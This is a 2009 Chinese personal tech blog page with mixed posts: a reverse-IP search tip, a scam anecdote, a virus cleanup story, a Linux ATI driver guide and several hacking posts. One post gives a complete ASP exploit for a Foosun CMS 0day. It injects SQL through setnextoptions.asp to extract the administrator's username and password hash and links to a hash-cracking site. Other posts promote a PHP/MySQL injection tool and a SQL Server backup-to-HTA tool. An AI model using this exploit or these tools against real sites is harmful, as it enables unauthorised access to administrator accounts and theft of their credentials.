微软Live Search另类用法
20 10月 2009 |
微软Live Search另类用法已关闭评论 http://cnweb.search.live.com/results.aspx?q=ip%3A58.221.33.228&form=QBLH&filt=all
搜索关键字“ip:58.221.33.228”,这样基本上可以确认某个IP下挂了哪些域名。
微软Live Search另类用法已关闭评论 遇到骗子了
最近网上比较流行盗了别的QQ号然后去骗他的好友的事情,没想到还给我碰到了。
以下是我和骗子的聊天记录,最后骗子无奈了!
大家以后注意点吧,这种事情网上太多了!
杀毒记
杀毒记已关闭评论 前一段时间不知道给电脑上装什么东西,给搞中毒了,当时也没在意,只是知道中毒了,可是没过几天问题就来了,主页不停的被改,搞的人都郁闷了,一气之下把注册表锁了,结果问题算是暂时解决了,由于太忙一直也没有时间去管他,可是这样又没有过几天又变新花样了,竞然会免费帮我装金山杀毒软件。。。 这下真的把我搞火了,所以今天就花了一点时间把他给搞定了,这个病毒还挺有意思,杀软不杀360不报,同时会在注册表和System32目录生成多个文件和驱,另外他还关联了右键,只要你点右键程序就会自动运行。以下是一部分他在C盘生成的文件和驱动,CLMBR.SYS和EXECL的除外
只要大家把这些文件删除掉就OK了,同时记的把注册表中有关srsvc.dll的值全删除掉。
风讯CMS 0DAY exploits
风讯CMS 0DAY exploits已关闭评论 把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
<herd><title>foosun cms 0day exploits</title> </herd> <body> <% web=request("web") id=request("id") %> 关键字:会员注册step 1 of 4 step<br> <form action='' method=post> 输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br> 要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br> <input type=submit value="我要暴"> </form> <form> <% function bin2str(bin) dim tmp,ustr tmp="" for i=1 to LenB(bin)-1 ustr=AscB(MidB(bin,i,1)) if ustr>127 then i=i+1 tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1))) else tmp=tmp&chr(ustr) end if next bin2str=tmp end function webuser=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id webpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id if web="" then else set x=server.createObject("Microsoft.XMLHTTP") x.open "get",webuser,false x.send str=bin2str(x.responseBody) response.write "你暴的网站地址:"&web&"<br><br>第"&id&"位的管理员<br>" response.write "<br><a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>" for i=126 to len(str) mid1=mid1&mid(str,i,1) next response.write "<br>------------------<br>帐号:"&mid1&"<br>" x.open "get",webpass,false x.send str=bin2str(x.responseBody) for i=126 to len(str) mid2=mid2&mid(str,i,1) next response.write "<br>密码:"&mid2&"<br>------------------<br>" response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>" set x=nothing end if %> |
具体的利用方法请参考源码。
php+mysql5半自动注入工具
php+mysql5半自动注入工具已关闭评论 作者:MIKAWAWA
经常碰到这样的注入环境,但有的时候网上给的工具并不能完全应付所有的环境。比如有的会有过滤啊啥的,为了方便我特意写了这个工具。基本上可以应付所有的php+mysql5的注入环境,因为自己可以直接修改注入语句,所以只要手工能绕过的过滤,该工具都可以。而且我添加了最新使用group_concat获取数据的方式,可以大大降低注入时提交的语句量和获取数据的时间。先看看界面吧:
注入界面应该都能看得懂吧。中间就是查询语句的构造。其中最重要的就是”select”框后面的内容了,要将页面上能显出的对应数字替换成”MIKA_MIKA”。
Exploiters区域里的exploit databases是用来获取当前所有数据库的,直接点击一下就可以获取,不需要手动修改注入语句设置(你非要自己修改也没办法)。在下面的结果区域里,右键点击某条记录然后选择add to databse list可以将该条记录添加到f注入语句中的“from”输入框后面的列表框里以及“=”号后面的列表框里,这样就不用手工输入了(你非要手工输入没办法)。
exploit tables直接点击是获取当前数据库的所有表(即“=”号框后面的列表框选择的是database()),要获取其它数据库的表请修改更改”=”号后面列表框里的内容。在下方显示的内容记录上右键可以选择add to table list可以添加到”.”框后面的列表框以及”=”号后面的列表框中。
…
sqlserver备份hta工具(支持sqlserver2005)
sqlserver备份hta工具(支持sqlserver2005)已关闭评论 作者:MIKAWAWA
最近碰到这个问题,在网上找了些工具,要么不好使要么就是只支持sqlserver2000,为了以后方便使用,随手写了个工具。里面用到的备份代码都是网上公开的,截图如下:
备份用的代码直接来源于网上,如果觉得有错误或者想自己改就直接把前后代码编码成16进制后,放到第一个框和最后一个框中即可。
工具使用不多说了,很简单,自己琢磨吧!
下载文件:Backup2hta
Ubuntu下安装ATI显卡驱动的方法
Ubuntu下安装ATI显卡驱动的方法已关闭评论 今天困扰我一周的驱动问题终于解决了,下面给大家说说具体的安装方法。
首先要把受限的驱动给删除掉,具体的方法是在新得立中搜索和fglrx相关的然后删除掉
删除完成后来到终端下
输入:
|
1 |
sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++5 dkms |
安装编译程序,安装完成后开始编译下载好的驱动文件,驱动文件要到官方去下载,下载地址为:http://ati.amd.com/support/driver.html
现在开始编译安装输入:
|
1 2 3 4 |
sh ati-driver-installer-9.2-x86.x86_64.run --buildpkg Ubuntu/8.10 sudo dpkg -i *.deb sudo apt-get -f install sudo aticonfig --initial |
安装完成后重启就可以了,如果重启后黑屏可以按ctrl+alt+F1进入命令模式。
输入
|
1 |
cd /etc/X11 |
然后
|
1 |
vim xorg.conf |
在 Section“screen”段的end section 前加一段
|
1 2 3 4 5 |
<span style="color: #ff0000;">SubSection "Display" Virtual 1024 768</span> <span style="color: #ff0000;">Modes “1024×768@75″ EndSubSection</span> |
如果你的显示器很差,我看就加800 600 吧。
这里要注意,你要学会vim怎么用以后再去编辑,不然后果很严重,别说我没提醒你啊。
最后重启就可以解决问题了,重启完成后可以到终端输入 fglrxinfo查看下显卡信息,这时你就会看到
display: :0.0 screen: 0
OpenGL vendor string: ATI Technologies Inc.
OpenGL renderer string: ATI Radeon HD 3200 Graphics
OpenGL version string: 2.1.8494 Release
这说明驱动已经安装成功了!